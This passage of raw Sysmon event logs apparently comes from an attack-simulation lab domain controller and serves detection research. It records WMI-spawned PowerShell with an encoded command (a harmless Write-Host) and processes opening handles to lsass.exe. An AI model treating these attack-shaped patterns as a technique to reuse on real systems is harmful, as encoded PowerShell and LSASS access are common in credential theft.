6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002236396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_spzvdzts.qdb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_eodnhz3h.odq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.729{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -E VwByAGkAdABlAC0ASABvAHMAdAAgADEAYgBmAGQAZgA4ADUANwAtAGUAMABiADEALQA0ADMAOQA0AC0AOAA5ADMAMgAtADkAOAAwAGYAZQA0AGEAMwAyADMAZgBlAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002236386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.715{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_eodnhz3h.odq.ps12021-03-02 16:52:51.715 10341000x80000000000000002236385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\